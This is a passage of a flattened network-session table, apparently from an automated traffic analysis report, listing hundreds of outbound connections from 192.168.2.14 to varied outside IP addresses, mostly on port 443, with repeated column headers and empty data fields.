                                                      11538192.168.2.1439588175.143.242.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11539192.168.2.1436574144.146.208.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11540192.168.2.143399850.99.26.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11541192.168.2.1435144187.233.111.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11542192.168.2.1454126102.29.116.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11543192.168.2.145817438.200.90.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11544192.168.2.1436482150.57.92.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11545192.168.2.1436030119.214.188.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11546192.168.2.144577850.50.107.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11547192.168.2.1434010170.159.148.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11548192.168.2.1446422104.42.134.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11549192.168.2.1450776195.108.142.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11550192.168.2.144244243.3.101.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11551192.168.2.1458350167.78.69.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11552192.168.2.1449394198.223.204.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11553192.168.2.145840475.142.107.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11554192.168.2.1444616166.207.250.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11555192.168.2.143518819.40.1.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11556192.168.2.1435768106.63.252.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11557192.168.2.145814280.208.131.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11558192.168.2.1441308166.223.42.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11559192.168.2.145753288.177.159.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11560192.168.2.1438538174.136.40.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11561192.168.2.1440934142.48.54.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11562192.168.2.145359448.142.122.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11563192.168.2.1440832160.73.125.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11564192.168.2.145682032.190.188.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11565192.168.2.1439784113.86.94.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11566192.168.2.144274432.144.241.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11567192.168.2.1449702175.241.156.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11568192.168.2.1459534114.139.13.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11569192.168.2.1444568110.47.202.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11570192.168.2.145527417.67.39.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11571192.168.2.1443514222.108.196.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11572192.168.2.1454676123.31.160.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11573192.168.2.1435632222.208.211.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11574192.168.2.14487168.5.99.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11575192.168.2.1458908188.109.53.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11576192.168.2.1442288173.180.93.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11577192.168.2.1442852194.146.171.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11578192.168.2.1440278148.137.30.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11579192.168.2.1442936149.191.78.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11580192.168.2.1444430191.252.207.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11581192.168.2.1445222109.72.98.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11582192.168.2.1457060169.94.48.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11583192.168.2.1439348119.115.248.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11584192.168.2.145740619.156.170.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11585192.168.2.1451094143.189.238.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11586192.168.2.145614880.165.89.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11587192.168.2.1456812148.118.117.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11588192.168.2.145554280.19.117.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11589192.168.2.1439560165.105.126.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11590192.168.2.1452886173.19.221.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11591192.168.2.145870212.86.247.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11592192.168.2.1448714158.36.207.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11593192.168.2.1445766211.220.136.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11594192.168.2.1445730211.150.149.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11595192.168.2.143697281.19.194.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11596192.168.2.1440258138.160.248.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11597192.168.2.143718661.47.148.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11598192.168.2.1458708166.2.30.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11599192.168.2.1438424182.8.255.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11600192.168.2.1443610165.202.210.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11601192.168.2.1438490115.79.127.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11602192.168.2.1446938111.217.93.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11603192.168.2.1453428126.45.232.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11604192.168.2.1457740197.116.103.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11605192.168.2.1455992200.148.191.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11606192.168.2.1452248129.91.86.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11607192.168.2.1448838219.240.245.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11608192.168.2.1440678101.164.143.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11609192.168.2.144450482.237.3.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11610192.168.2.1443018157.187.183.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11611192.168.2.145210081.210.201.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11612192.168.2.1454478202.81.213.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11613192.168.2.143414277.37.123.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11614192.168.2.1456054190.171.38.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11615192.168.2.1440444125.223.33.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11616192.168.2.1456690173.161.117.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11617192.168.2.1445674189.107.57.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11618192.168.2.144541689.131.17.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11619192.168.2.1439760183.197.225.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11620192.168.2.1460326204.196.115.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11621192.168.2.1443004133.194.20.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11622192.168.2.1456756119.218.25.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11623192.168.2.1451430186.170.173.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11624192.168.2.1440176188.50.171.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11625192.168.2.1452294202.148.102.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11626192.168.2.1445244204.226.142.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11627192.168.2.145353092.119.168.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11628192.168.2.1456070139.241.131.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11629192.168.2.145552082.48.71.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11630192.168.2.1439918176.72.128.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11631192.168.2.1458454181.236.23.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11632192.168.2.1434312118.52.59.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11633192.168.2.143973435.138.34.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11634192.168.2.1449700208.99.59.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11635192.168.2.1445050108.139.183.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11636192.168.2.143917646.61.96.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11637192.168.2.1450222189.87.124.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11638192.168.2.145437296.218.212.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11639192.168.2.1451058152.31.102.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11640192.168.2.145367213.187.146.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11641192.168.2.1451834206.25.89.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11642192.168.2.1434436197.218.215.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11643192.168.2.145601224.149.230.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11644192.168.2.145706464.79.72.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11645192.168.2.1450470217.108.94.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11646192.168.2.144224018.134.71.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11647192.168.2.143974488.193.195.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11648192.168.2.1446762163.141.37.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11649192.168.2.1460828189.175.130.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11650192.168.2.14498108.2.121.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11651192.168.2.1453076162.33.185.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11652192.168.2.143441066.176.112.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11653192.168.2.1459524219.114.14.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11654192.168.2.1433924203.225.204.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11655192.168.2.1442812128.117.28.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11656192.168.2.1460904148.139.73.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11657192.168.2.143840645.77.197.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11658192.168.2.14372862.221.229.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11659192.168.2.1447322200.74.201.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11660192.168.2.1454600137.248.198.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11661192.168.2.144516678.163.248.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11662192.168.2.1439166197.229.247.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11663192.168.2.143302879.159.207.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11664192.168.2.1447694220.2.149.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11665192.168.2.1456292148.193.160.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11666192.168.2.14366329.8.56.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11667192.168.2.1449120130.54.212.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11668192.168.2.145821079.160.27.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11669192.168.2.144883637.129.215.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11670192.168.2.145087820.182.75.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11671192.168.2.1449042144.93.159.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11672192.168.2.145659861.32.141.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11673192.168.2.145004072.77.201.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11674192.168.2.145160059.151.80.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11675192.168.2.1433304197.4.101.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11676192.168.2.1458532148.236.188.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11677192.168.2.144114885.180.187.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11678192.168.2.1436820143.44.202.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11679192.168.2.144096014.207.46.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11680192.168.2.1436700143.151.58.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11681192.168.2.1436164166.168.198.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11682192.168.2.1432970132.20.197.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11683192.168.2.1451920113.89.71.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11684192.168.2.143741057.248.72.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11685192.168.2.143909620.29.181.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11686192.168.2.1443936125.130.245.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11687192.168.2.1446982218.244.0.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11688192.168.2.1440972147.187.240.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11689192.168.2.1440956162.69.45.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11690192.168.2.1443126149.16.147.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11691192.168.2.1459244156.194.216.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11692192.168.2.1456088174.120.108.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11693192.168.2.1433506202.41.51.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11694192.168.2.1451380122.202.89.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11695192.168.2.1447530158.174.85.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11696192.168.2.1456550216.253.114.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11697192.168.2.145768675.166.5.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11698192.168.2.1459790222.152.136.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11699192.168.2.145835023.148.180.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11700192.168.2.1438510104.250.34.2018080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11701192.168.2.144081841.223.197.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11702192.168.2.144254674.98.76.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11703192.168.2.1456544117.140.183.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11704192.168.2.144867880.17.0.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11705192.168.2.1459284172.219.74.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11706192.168.2.1459700222.203.76.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11707192.168.2.144520061.223.59.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11708192.168.2.145981427.222.136.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11709192.168.2.1446448110.101.179.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11710192.168.2.1448474152.176.193.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11711192.168.2.1441348221.18.101.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11712192.168.2.1447624130.209.26.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11713192.168.2.1456678202.22.2.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11714192.168.2.1460894119.187.1.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11715192.168.2.1438970121.180.221.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11716192.168.2.144200863.37.149.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11717192.168.2.144228078.129.115.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11718192.168.2.144217618.38.8.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11719192.168.2.145428637.47.113.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11720192.168.2.144045467.14.245.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11721192.168.2.143365689.234.179.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11722192.168.2.143598097.5.4.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11723192.168.2.1440544146.196.218.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11724192.168.2.1435910202.145.64.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11725192.168.2.1457446183.201.147.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11726192.168.2.1451756107.162.8.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11727192.168.2.145889680.195.83.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11728192.168.2.1442472169.19.149.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11729192.168.2.1450512114.254.208.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11730192.168.2.143808873.253.183.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11731192.168.2.1453054132.4.249.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11732192.168.2.144956676.219.222.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11733192.168.2.1455598178.13.10.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11734192.168.2.143329046.57.154.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11735192.168.2.1440556123.155.9.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11736192.168.2.1454318167.241.77.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11737192.168.2.146017051.90.220.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11738192.168.2.143384213.84.220.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11739192.168.2.1459680138.198.4.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11740192.168.2.1457588162.94.240.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11741192.168.2.145804280.247.71.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11742192.168.2.144594269.67.43.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11743192.168.2.144568481.133.24.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11744192.168.2.145214877.200.2.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11745192.168.2.143850866.114.136.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11746192.168.2.1453546222.132.100.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11747192.168.2.14482768.179.210.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11748192.168.2.1451704192.204.123.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11749192.168.2.1449574115.249.155.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
